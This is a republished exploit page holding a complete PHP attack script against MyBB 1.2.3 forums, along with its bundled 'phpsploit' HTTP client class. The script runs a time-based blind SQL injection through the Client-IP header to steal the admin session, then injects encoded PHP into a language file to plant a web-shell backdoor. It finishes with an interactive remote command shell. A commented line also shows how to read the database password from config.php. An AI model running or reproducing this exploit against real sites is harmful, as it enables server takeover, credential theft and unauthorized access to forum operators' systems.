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MyBulletinBoard (MyBB) <= 1.2.3 Remote Code Execution Exploit
来源:http://www.acid-root.new.fr 作者:DarkFig 发布时间:2007-04-04  
error_reporting(E_ALL ^ E_NOTICE);

# http://www.milw0rm.com/exploits/2012
# They corrected (not all) a lot of SQL requests which use the ipaddress, with $db->escape_string.
# They don't corrected the function (this is a choice ... the bad) and they forgot to correct 1 (only) SQL request.
# They must correct the problem at the source =)
if($argc < 3)
---  MyBulletinBoard (MyBB) <= 1.2.3 Remote Code Execution Exploit  ---
PHP conditions: none
       Credits: DarkFig <gmdarkfig@gmail.com>
           URL: http://www.acid-root.new.fr/
  Usage: $argv[0] -url http://victim.com/ [Options]
 Params: -url       For example http://victim.com/myBB/
Options: -debug     Debug mod activated (debug_mybb.html)
         -truetime  Server response time which returns true
         -benchmark You can change the value used in benchmark()
         -proxy     If you wanna use a proxy <proxyhost:proxyport> 
         -proxyauth Basic authentification <proxyuser:proxypwd>
   Note: If you have some problems use -debug, -benchmark, -truetime

$url       = getparam('url',1);
$debug     = (getparam('debug')!='')     ? 1 : 0;
$benchmark = (getparam('benchmark')!='') ? getparam('benchmark') : '1000000';
$proxy     = getparam($proxy);
$proxyauth = getparam($proxyauth);

$backdoor  = 'uploads/avatars/backdoor.php'; # inc/cache/backdoor.php
$filetoed  = 'index.lang.php';

$xpl = new phpsploit();
if($proxy) $xpl->proxy($proxy);
if($proxyauth) $xpl->proxyauth($proxyauth);
if($debug) debug(1);

# There is two solutions to be logged in as administrator.
# mysql> select * from mybb_users\G
# *************************** 1. row ***************************
#              uid: 1
#         username: root
#         password: 39ac8681f5cf4fcd9c9c09719a618bd3
#             salt: BFeJBOCF
#         loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA...
# $xpl->post($url.'admin/index.php','username=root&password=toor&do=login&goto=');
# print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel...
# mysql> select * from mybb_adminsessions\G
# *************************** 1. row ***************************
#        sid: 81e267263b9254f3aaf670383bfbfec9
#        uid: 1
#   loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA
#         ip:
#   dateline: 1175443967
# lastactive: 1175444369
# $xpl->addheader('Client-IP','');
# $xpl->get($url.'admin/index.php?adminsid=81e267263b9254f3aaf670383bfbfec9');
# print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel...
# I decided to use the solution number 2.
# We can also add an administrator (easily) ... but it's not interesting.
print "\nAdmin IP : "; $ip  = sql_inject('ip');
print "\nAdmin sid: "; $sid = sql_inject('sid');
print "\nTrying to be logged in as administrator";


# Trying to find the language
if(preg_match('#<input type="hidden" name="lang" value="(\S*)"#',$xpl->getcontent(),$langmatches)) $lang=$langmatches[1];
else $lang='english';
print "\nLanguage: $lang";

# Language configuration

# We can't use:
# - <? OR <?php
# - <script language="php">
# - ' OR "
$PHPCODE = '${${error_reporting(0)}}'
          .'${${fwrite($handle,'.chrit('<?php error_reporting(0);eval(
SERVER[HTTP_SHELL]);exit(0); ?>').')}}' .'${${fclose($handle)}}'; $name_value[2][0] .= $PHPCODE; $postdata=array(frmdt_url => $url.'admin/languages.php', "adminsid" => $sid, "action" => "do_edit", "lang" => $lang, "editwith" => 0, "inadmin"=> 0, "file"=> $filetoed, "Update Language Variables"=>" Update Language Variables"); for($i=0;$i<count($name_value[1]);$i++) $postdata[html_entity_decode($name_value[1][$i])] = html_entity_decode($name_value[2][$i]); # print $xpl->showlastrequest(); $xpl->formdata($postdata); # Trying to execute the php code $xpl->get($url.'index.php'); # If not the default language $xpl->get($url.'inc/languages/'.$lang.'/'.$filetoed); print "\nThe php file should be created\n\$shell> "; # Hello master while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN))))) { # ');include('../../inc/config.php');print $config['password'];// $xpl->addheader('Shell',"system('$cmd');"); $xpl->get($url.$backdoor); print $xpl->getcontent()."\n\$shell> "; } function sql_inject($field) { global $xpl,$url,$prefix,$debug,$result,$bef,$aft,$truetime,$benchmark,$a,$b,$sub,$f; #,$fakeip $sub=0;$string=''; if($field=='ip') {$a='44';$b='57';} # . 0-9 else {$a='46';$b='70';} # 0-9 A-Z while(TRUE) { $sub++; for($i=$a;$i<=$b;$i++) { # Random ip $fakeip = rand(128,254).'.' .rand(128,254).'.' .rand(128,254).'.' .rand(128,254); # Calculation of the server response time which returns TRUE if($i==$a) $f='TST'; # End of the string ? elseif($i==($a+1)) $f='NULL'; # Test the char else $f=$i; # Table prefix if($sub==1 AND $i==$a) { $xpl->addheader('Client-IP',$fakeip."'<script>alert(666)</script>"); $xpl->get($url.'index.php'); if(preg_match("#DELETE FROM (\S*)sessions#i",$xpl->getcontent(),$match)) $prefix=$match[1]; else $prefix='mybb_'; } # +-class_session.php (#2) # | # 475. function create_session($uid=0) # 476. { # 477. global $db; # 478. $speciallocs = $this->get_special_locations(); # 479. # 480. // If there is a proper uid, delete by uid. # 481. if($uid > 0) # 482. { # 483. $db->delete_query(TABLE_PREFIX."sessions", "uid=".$uid); # 484. $onlinedata['uid'] = $uid; # 485. } # 486. // Else delete by ip. # 487. else # 488. { // $this->ipaddress = get_ip(); # 489. $db->delete_query(TABLE_PREFIX."sessions", "ip='".$this->ipaddress."'"); # 490. $onlinedata['uid'] = 0; # 491. } # $sql = $fakeip."' OR ip=(SELECT IF(SUBSTR("; $sql .= ($f=='TST') ? "(SELECT 1)" : "(SELECT $field FROM ${prefix}adminsessions ORDER BY lastactive DESC LIMIT 1)"; $sql .= ($f=='TST') ? ",1" : ",$sub"; $sql .= ($f=='TST') ? ",1)=CHAR(49)" : ",1)=CHAR($f)"; $sql .= ",BENCHMARK($benchmark,CHAR(66)),1)) #"; # +-functions.php (#1) # | # 1836. function get_ip() # 1837. { # 1838. if(isset(
SERVER['HTTP_X_FORWARDED_FOR'])) # 1839. { # 1840. if(preg_match_all("#[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}#s",
SERVER['HTTP_X_FORWARDED_FOR'], $addresses)) # 1841. { # 1842. foreach($addresses[0] as $key => $val) # 1843. { # 1844. if(!preg_match("#^(10|172\.16|192\.168)\.#", $val)) # 1845. { # 1846. $ip = $val; # 1847. break; # 1848. } # 1849. } # 1850. } # 1851. } # 1852. if(!isset($ip)) # 1853. { # 1854. if(isset(
SERVER['HTTP_CLIENT_IP'])) # 1855. { # 1856. $ip =
SERVER['HTTP_CLIENT_IP']; # 1857. } # 1858. else # 1859. { # 1860. $ip =
SERVER['REMOTE_ADDR']; # 1861. } # 1862. } # 1863. return $ip; # 1864. } # $bef = time(); $xpl->reset('header'); $xpl->addheader('Client-IP',$sql); $xpl->get($url.'index.php'); $aft = time(); if($f=='TST') $truetime=$aft-$bef; if(getparam('truetime')!='') $truetime=getparam('truetime'); # Server response time >= Server response time which returns TRUE ? $restime = $aft-$bef; if($restime >= $truetime AND $f != 'TST') $result='TRUE'; else $result='FALSE'; # Debug mode activated if($debug) debug('',$field); # The tested char returns TRUE if($result=='TRUE') { if($f!='NULL') { # Continue print strtolower(chr($f)); $string .= chr($f); break; } else { # End of the string $xpl->reset('header'); return $string; } } # Retry if no char found if($f==$b) $sub--; } } } function debug($init='',$dafield='') { global $result,$bef,$aft,$truetime,$benchmark,$a,$b,$sub,$f; #,$fakeip if($init) { $handle = fopen("debug_mybb.html","w+"); $data = "<h1><div align='center'>MyBulletinBoard (MyBB) &lt;= 1.2.3 Code Execution Exploit</div></h1> <pre><table width='0' border='1' align='center' cellspacing='0'><tr> <td align='center'><b>REQUEST TIME</b></td> <td align='center'><b>RESPONSE TIME</b></td> <td align='center'><b>TRUETIME</b></td> <td align='center'><b>BENCHMARK</b></td> <td align='center'><b>RESULT</b></td>"; # <td align='center'><b>IP</b></td> $data .= "<td align='center'><b>FIELD</b></td> <td align='center'><b>CHARSET</b></td> <td align='center'><b>SUBSTR()</b></td> <td align='center'><b>ORD()</b></td> <td align='center'><b>CHAR()</b></td>"; fwrite($handle,$data); fclose($handle); } else { $handle = fopen("debug_mybb.html","a"); $data = "<tr".(($result=='TRUE') ? " bgcolor='#FFFF00'" : "")."> <td align='center'>&nbsp;".htmlentities($bef)."&nbsp;</td> <td align='center'>&nbsp;".htmlentities($aft)."&nbsp;</td> <td align='center'>&nbsp;".htmlentities($truetime)."&nbsp;</td> <td align='center'>&nbsp;".htmlentities($benchmark)."&nbsp;</td> <td align='center'>&nbsp;".htmlentities($result)."&nbsp;</td>"; # <td align='center'>&nbsp;".htmlentities($fakeip)."&nbsp;</td> $data .= "<td align='center'>&nbsp;".htmlentities($dafield)."&nbsp;</td> <td align='center'>&nbsp;".htmlentities("$a-$b")."&nbsp;</td> <td align='center'>&nbsp;".htmlentities($sub)."&nbsp;</td> <td align='center'>&nbsp;".htmlentities($f)."&nbsp;</td> <td align='center'>&nbsp;".htmlentities(chr($f))."&nbsp;</td></tr>"; fwrite($handle,$data); fclose($handle); } } function chrit($string) { $char = ''; for($i=0;$i<strlen($string);$i++) { $char .= 'chr('.ord($string[$i]).')'; $char .= ($i != (strlen($string)-1)) ? '.' : ''; } return $char; } function getparam($param,$opt='') { global $argv; foreach($argv as $value => $key) { if($key == '-'.$param) { if(!empty($argv[$value+1])) return $argv[$value+1]; else return 1; } } if($opt) exit("\n-$param parameter required"); else return; } /* * * Copyright (C) darkfig * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. * * TITLE: PhpSploit Class * REQUIREMENTS: PHP 5 (remove "private", "public" if you have PHP 4) * VERSION: 1.2 * LICENSE: GNU General Public License * ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt * FILENAME: phpsploitclass.php * * CONTACT: gmdarkfig@gmail.com (french / english) * GREETZ: Sparah, Ddx39 * * DESCRIPTION: * The phpsploit is a class implementing a web user agent. * You can add cookies, headers, use a proxy server with (or without) a * basic authentification. It supports the GET and the POST method. It can * also be used like a browser with the cookiejar() function (which allow * a server to add several cookies for the next requests) and the * allowredirection() function (which allow the script to follow all * redirections sent by the server). It can return the content (or the * headers) of the request. Others useful functions can be used for debugging. * A manual is actually in development but to know how to use it, you can * read the comments. * * CHANGELOG: * [2007-01-24] (1.2) * * Bug #2 fixed: Problem concerning the getcookie() function ((|;)) * * New: multipart/form-data enctype is now supported * * [2006-12-31] (1.1) * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug) * * New: You can now call the getheader() / getcontent() function without parameters * * [2006-12-30] (1.0) * * First version * */ class phpsploit { /** * This function is called by the get()/post() functions. * You don't have to call it, this is the main function. * * @return $server_response */ private function sock() { if(!empty($this->proxyhost) && !empty($this->proxyport)) $socket = fsockopen($this->proxyhost,$this->proxyport); else $socket = fsockopen($this->host,$this->port); if(!$socket) die("Error: The host doesn't exist"); if($this->method==="get") $this->packet = "GET ".$this->url." HTTP/1.1\r\n"; elseif($this->method==="post" or $this->method==="formdata") $this->packet = "POST ".$this->url. " HTTP/1.1\r\n"; else die("Error: Invalid method"); if(!empty($this->proxyuser)) $this->packet .= "Proxy-Authorization: Basic ".base64_encode($this->proxyuser.":".$this->proxypass)."\r\n"; $this->packet .= "Host: ".$this->host."\r\n"; if(!empty($this->agent)) $this->packet .= "User-Agent: ".$this->agent."\r\n"; if(!empty($this->header)) $this->packet .= $this->header."\r\n"; if(!empty($this->cookie)) $this->packet .= "Cookie: ".$this->cookie."\r\n"; $this->packet .= "Connection: Close\r\n"; if($this->method==="post") { $this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $this->packet .= "Content-Length: ".strlen($this->data)."\r\n\r\n"; $this->packet .= $this->data."\r\n"; } elseif($this->method==="formdata") { $this->packet .= "Content-Type: multipart/form-data; boundary=---------------------------".$this->boundary."\r\n"; $this->packet .= "Content-Length: ".strlen($this->data)."\r\n\r\n"; $this->packet .= $this->data; } $this->packet .= "\r\n"; $this->recv = ''; fputs($socket,$this->packet); while(!feof($socket)) $this->recv .= fgets($socket); fclose($socket); if($this->cookiejar) $this->cookiejar($this->getheader($this->recv)); if($this->allowredirection) return $this->allowredirection($this->recv); else return $this->recv; } /** * This function allows you to add several cookie in the * request. Several methods are supported: * * $this->addcookie("name","value"); * or * $this->addcookie("name=newvalue"); * or * $this->addcookie("othername=overvalue; xx=zz; y=u"); * * @param string $cookiename * @param string $cookievalue * */ public function addcookie($cookn,$cookv='') { // $this->addcookie("name","value"); work avec replace if(!empty($cookv)) { if($cookv === "deleted") $cookv=''; // cookiejar(1) && Set-Cookie: name=delete if(!empty($this->cookie)) { if(preg_match("/$cookn=/",$this->cookie)) { $this->cookie = preg_replace("/$cookn=(\S*);/","$cookn=$cookv;",$this->cookie); } else { $this->cookie .= " ".$cookn."=".$cookv.";"; // " ". } } else { $this->cookie = $cookn."=".$cookv.";"; } } // $this->addcookie("name=value; othername=othervalue"); else { if(!empty($this->cookie)) { $cookn = preg_replace("/(.*);$/","$1",$cookn); $cookarr = explode(";",str_replace(" ", "",$cookn)); for($i=0;$i<count($cookarr);$i++) { preg_match("/(\S*)=(\S*)/",$cookarr[$i],$matches); $cookn = $matches[1]; $cookv = $matches[2]; $this->addcookie($cookn,$cookv); } } else { $cookn = ((substr($cookn,(strlen($cookn)-1),1))===";") ? $cookn : $cookn.";"; $this->cookie = $cookn; } } } /** * This function allows you to add several headers in the * request. Several methods are supported: * * $this->addheader("headername","headervalue"); * or * $this->addheader("headername: headervalue"); * * @param string $headername * @param string $headervalue */ public function addheader($headern,$headervalue='') { // $this->addheader("name","value"); if(!empty($headervalue)) { if(!empty($this->header)) { if(preg_match("/$headern:/",$this->header)) { $this->header = preg_replace("/$headern: (\S*)/","$headern: $headervalue",$this->header); } else { $this->header .= "\r\n".$headern.": ".$headervalue; } } else { $this->header=$headern.": ".$headervalue; } } // $this->addheader("name: value"); else { if(!empty($this->header)) { $headarr = explode(": ",$headern); $headern = $headarr[0]; $headerv = $headarr[1]; $this->addheader($headern,$headerv); } else { $this->header=$headern; } } } /** * This function allows you to use an http proxy server. * Several methods are supported: * * $this->proxy("proxyip","8118"); * or * $this->proxy("proxyip:8118") * * @param string $proxyhost * @param integer $proxyport */ public function proxy($proxy,$proxyp='') { // $this->proxy("localhost:8118"); if(empty($proxyp)) { preg_match("/^(\S*):(\d+)$/",$proxy,$proxarr); $proxh = $proxarr[1]; $proxp = $proxarr[2]; $this->proxyhost=$proxh; $this->proxyport=$proxp; } // $this->proxy("localhost",8118); else { $this->proxyhost=$proxy; $this->proxyport=intval($proxyp); } if($this->proxyport > 65535) die("Error: Invalid port number"); } /** * This function allows you to use an http proxy server * which requires a basic authentification. Several * methods are supported: * * $this->proxyauth("darkfig","dapasswd"); * or * $this->proxyauth("darkfig:dapasswd"); * * @param string $proxyuser * @param string $proxypass */ public function proxyauth($proxyauth,$proxypasse='') { // $this->proxyauth("darkfig:password"); if(empty($proxypasse)) { preg_match("/^(.*):(.*)$/",$proxyauth,$proxautharr); $proxu = $proxautharr[1]; $proxp = $proxautharr[2]; $this->proxyuser=$proxu; $this->proxypass=$proxp; } // $this->proxyauth("darkfig","password"); else { $this->proxyuser=$proxyauth; $this->proxypass=$proxypasse; } } /** * This function allows you to set the "User-Agent" header. * Several methods are possible to do that: * * $this->agent("Mozilla Firefox"); * or * $this->addheader("User-Agent: Mozilla Firefox"); * or * $this->addheader("User-Agent","Mozilla Firefox"); * * @param string $useragent */ public function agent($useragent) { $this->agent=$useragent; } /** * This function returns the header which will be * in the next request. * * $this->showheader(); * * @return $header */ public function showheader() { return $this->header; } /** * This function returns the cookie which will be * in the next request. * * $this->showcookie(); * * @return $storedcookies */ public function showcookie() { return $this->cookie; } /** * This function returns the last formed * http request (the http packet). * * $this->showlastrequest(); * * @return $last_http_request */ public function showlastrequest() { return $this->packet; } /** * This function sends the formed http packet with the * GET method. You can precise the port of the host. * * $this->get("http://localhost"); * $this->get("http://localhost:888/xd/tst.php"); * * @param string $urlwithpath * @return $server_response */ public function get($url) { $this->target($url); $this->method="get"; return $this->sock(); } /** * This function sends the formed http packet with the * POST method. You can precise the port of the host. * * $this->post("http://localhost/index.php","admin=1&user=dark"); * * @param string $urlwithpath * @param string $postdata * @return $server_response */ public function post($url,$data) { $this->target($url); $this->method="post"; $this->data=$data; return $this->sock(); } /** * This function sends the formed http packet with the * POST method using the multipart/form-data enctype. * * $array = array( * frmdt_url => "http://localhost/upload.php", * frmdt_boundary => "123456", # Optional * "email" => "me@u.com", * "varname" => array( * frmdt_type => "image/gif", # Optional * frmdt_transfert => "binary", # Optional * frmdt_filename => "hello.php", * frmdt_content => "<?php echo ':)'; ?>")); * $this->formdata($array); * * @param array $array * @return $server_response */ public function formdata($array) { $this->target($array[frmdt_url]); $this->method="formdata"; $this->data=''; if(!isset($array[frmdt_boundary])) $this->boundary="phpsploit"; else $this->boundary=$array[frmdt_boundary]; foreach($array as $key => $value) { if(!preg_match("#^frmdt_(boundary|url)#",$key)) { $this->data .= "-----------------------------".$this->boundary."\r\n"; $this->data .= "Content-Disposition: form-data; name=\"".$key."\";"; if(!is_array($value)) { $this->data .= "\r\n\r\n".$value."\r\n"; } else { $this->data .= " filename=\"".$array[$key][frmdt_filename]."\";\r\n"; if(isset($array[$key][frmdt_type])) $this->data .= "Content-Type: ".$array[$key][frmdt_type]."\r\n"; if(isset($array[$key][frmdt_transfert])) $this->data .= "Content-Transfer-Encoding: ".$array[$key][frmdt_transfert]."\r\n"; $this->data .= "\r\n".$array[$key][frmdt_content]."\r\n"; } } } $this->data .= "-----------------------------".$this->boundary."--\r\n"; return $this->sock(); } /** * This function returns the content of the server response * without the headers. * * $this->getcontent($this->get("http://localhost/")); * or * $this->getcontent(); * * @param string $server_response * @return $onlythecontent */ public function getcontent($code='') { if(empty($code)) $code = $this->recv; $content = explode("\n",$code); $onlycode = ''; for($i=1;$i<count($content);$i++) { if(!preg_match("/^(\S*):/",$content[$i])) $ok = 1; if($ok) $onlycode .= $content[$i]."\n"; } return $onlycode; } /** * This function returns the headers of the server response * without the content. * * $this->getheader($this->post("http://localhost/x.php","x=1&z=2")); * or * $this->getheader(); * * @param string $server_response * @return $onlytheheaders */ public function getheader($code='') { if(empty($code)) $code = $this->recv; $header = explode("\n",$code); $onlyheader = $header[0]."\n"; for($i=1;$i<count($header);$i++) { if(!preg_match("/^(\S*):/",$header[$i])) break; $onlyheader .= $header[$i]."\n"; } return $onlyheader; } /** * This function is called by the cookiejar() function. * It adds the value of the "Set-Cookie" header in the "Cookie" * header for the next request. You don't have to call it. * * @param string $server_response */ private function getcookie($code) { $carr = explode("\n",str_replace("\r\n","\n",$code)); for($z=0;$z<count($carr);$z++) { if(preg_match("/set-cookie: (.*)/i",$carr[$z],$cookarr)) { $cookie[] = preg_replace("/expires=(.*)(GMT||UTC)(\S*)$/i","",preg_replace("/path=(.*)/i","",$cookarr[1])); } } for($i=0;$i<count($cookie);$i++) { preg_match("/(\S*)=(\S*)(|;)/",$cookie[$i],$matches); $cookn = $matches[1]; $cookv = $matches[2]; $this->addcookie($cookn,$cookv); } } /** * This function is called by the get()/post() functions. * You don't have to call it. * * @param string $urltarg */ private function target($urltarg) { if(!preg_match("/^http:\/\/(.*)\//",$urltarg)) $urltarg .= "/"; $this->url=$urltarg; $array = explode("/",str_replace("http://","",preg_replace("/:(\d+)/","",$urltarg))); $this->host=$array[0]; preg_match("/:(\d+)\//",$urltarg,$matches); $this->port=empty($matches[1]) ? 80 : $matches[1]; $temp = str_replace("http://","",preg_replace("/:(\d+)/","",$urltarg)); preg_match("/\/(.*)\//",$temp,$matches); $this->path=str_replace("//","/","/".$matches[1]."/"); if($this->port > 65535) die("Error: Invalid port number"); } /** * If you call this function, the script will * extract all "Set-Cookie" headers values * and it will automatically add them into the "Cookie" header * for all next requests. * * $this->cookiejar(1); // enabled * $this->cookiejar(0); // disabled * */ public function cookiejar($code) { if($code===0) $this->cookiejar=''; if($code===1) $this->cookiejar=1; else { $this->getcookie($code); } } /** * If you call this function, the script will * follow all redirections sent by the server. * * $this->allowredirection(1); // enabled * $this->allowredirection(0); // disabled * * @return $this->get($locationresponse) */ public function allowredirection($code) { if($code===0) $this->allowredirection=''; if($code===1) $this->allowredirection=1; else { if(preg_match("/(location|content-location|uri): (.*)/i",$code,$codearr)) { $location = str_replace(chr(13),'',$codearr[2]); if(!eregi("://",$location)) { return $this->get("http://".$this->host.$this->path.$location); } else { return $this->get($location); } } else { return $code; } } } /** * This function allows you to reset some parameters: * * $this->reset(header); // headers cleaned * $this->reset(cookie); // cookies cleaned * $this->reset(); // clean all parameters * * @param string $func */ public function reset($func='') { switch($func) { case "header": $this->header=''; break; case "cookie": $this->cookie=''; break; default: $this->cookiejar=''; $this->header=''; $this->cookie=''; $this->allowredirection=''; $this->agent=''; break; } } } ?>

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·CVE-2012-0217 Intel sysret exp
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·IrfanView 3.99 (.ANI File) Loc
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